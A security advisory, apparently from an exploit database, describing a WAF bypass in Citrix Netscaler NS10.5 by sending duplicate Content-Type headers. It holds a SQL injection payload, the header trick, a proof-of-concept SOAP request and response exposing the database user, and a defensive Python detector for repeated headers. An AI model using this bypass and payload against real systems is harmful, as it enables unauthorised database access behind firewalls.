Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)

# Exploit Title: [Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution]
# Date: [Mar 13, 2015]
# Exploit Author: [BGA Security]
# Vendor Homepage: []
# Version: [NS10.5]
# Tested on: [NetScaler NS10.5: Build,]

Document Title:
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution

Release Date:
12 Mar 2015

Product & Service Introduction:
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.

Abstract Advisory Information:
BGA Security Team discovered an HTTP Header Pollution vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable).

Vulnerability Disclosure Timeline:
2 Feb 2015	Bug reported to the vendor.
4 Feb 2015	Vendor returned with a case ID.
5 Feb 2015	Detailed info/config given.
12 Feb 2015	Asked about the case.
16 Feb 2015	Vendor returned "investigating ..."
6 Mar 2015	Asked about the case.
6 Mar 2015	Vendor has validated the issue.
12 Mar 2015	There isn't any fix addressing the issue.

Discovery Status:

Affected Product(s):
Citrix Systems, Inc.
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)

Exploitation Technique:
Remote, Unauthenticated

Severity Level:

Technical Details & Description:
It is possible to bypass the Netscaler WAF using a method which may be called HTTP Header Pollution. The setup:

    An Apache web server with default configuration on Windows (XAMPP).
    A SOAP web service written in PHP which is vulnerable to SQL injection.
    Netscaler WAF with SQL injection rules.

First request: ' union select current_user,2# - Netscaler blocks it.

Second request: The same content plus one additional HTTP header, "Content-Type: application/octet-stream". - It bypasses the WAF, but the web server misinterprets the request.

Third request: The same content plus two additional HTTP headers, "Content-Type: application/octet-stream" and "Content-Type: text/xml", in that order. The request bypasses the WAF and the web server runs it.
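The three requests above imply that the WAF acts on the first Content-Type header (octet-stream, so the body is not inspected as XML) while Apache/PHP acts on the last one (text/xml). A defender can flag this disagreement before either parser sees the body. The following detector is an added example, not code from the advisory or from BGA; the two HTTP requests in it are constructed to mirror the clean and the polluted case, and the first-vs-last reading of the header is an assumption about the two implementations, not something the advisory states.

```python
"""Detect HTTP header pollution of the kind described in this advisory:
a request that repeats a header whose single value governs how the body
is parsed, so that a WAF reading the first value and a backend reading
the last value can disagree about what the body is."""
from typing import Dict, List, Optional, Tuple

# Headers that must appear at most once; a duplicate is suspicious on its own.
SINGLE_VALUED = {"content-type", "content-length", "transfer-encoding", "host"}


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs in wire order with lower-cased names.
    Reads the header block only; stops at the blank line before the body."""
    pairs: List[Tuple[str, str]] = []
    for line in raw.split("\r\n")[1:]:  # skip the request line
        if line == "":
            break
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def header_views(pairs: List[Tuple[str, str]], name: str) -> Tuple[Optional[str], Optional[str]]:
    """(first, last) value of a header: how a first-wins and a last-wins
    implementation would each read the same request (assumed model)."""
    values = [v for n, v in pairs if n == name]
    return (values[0], values[-1]) if values else (None, None)


def detect_pollution(raw: str) -> Dict[str, List[str]]:
    """Map every repeated single-valued header to all of its values in order.
    An empty dict means the request carries no such duplication."""
    pairs = parse_headers(raw)
    findings: Dict[str, List[str]] = {}
    for name in SINGLE_VALUED:
        values = [v for n, v in pairs if n == name]
        if len(values) > 1:
            findings[name] = values
    return findings


# Constructed requests (not captured traffic) mirroring the advisory's cases.
CLEAN = ("POST /service.php HTTP/1.1\r\nHost: example.test\r\n"
         "Content-Type: text/xml\r\nContent-Length: 4\r\n\r\n<a/>")
POLLUTED = ("POST /service.php HTTP/1.1\r\nHost: example.test\r\n"
            "Content-Type: application/octet-stream\r\n"
            "Content-Type: text/xml\r\nContent-Length: 4\r\n\r\n<a/>")

if __name__ == "__main__":
    print(detect_pollution(CLEAN))     # {} : a single Content-Type
    print(detect_pollution(POLLUTED))  # the two conflicting Content-Type values
    print(header_views(parse_headers(POLLUTED), "content-type"))
```

A rule that rejects any request with a repeated Content-Type (rather than picking the first or last value) closes the gap regardless of which side the WAF and the backend each honour.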

Proof of Concept (PoC):

Request body (excerpt, sent with the two Content-Type headers described above):

<soapenv:Envelope xmlns:soapenv="" xmlns:tem="">
      	<string>' union select current_user, 2#</string> 

Response body (excerpt):

<soap:Envelope xmlns:soap="" xmlns:xsi="" xmlns:xsd="">
      <return xsi:type="xsd:string"> Name: root@localhost </return>

Solution Fix & Patch:
12 Mar 2015	There isn't any fix addressing the issue.

Security Risk:
The risk of the vulnerability above is estimated as high.

Credits & Authors:
BGA Bilgi Güvenliği - Onur ALANBEL

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Copyright © 2015 | BGA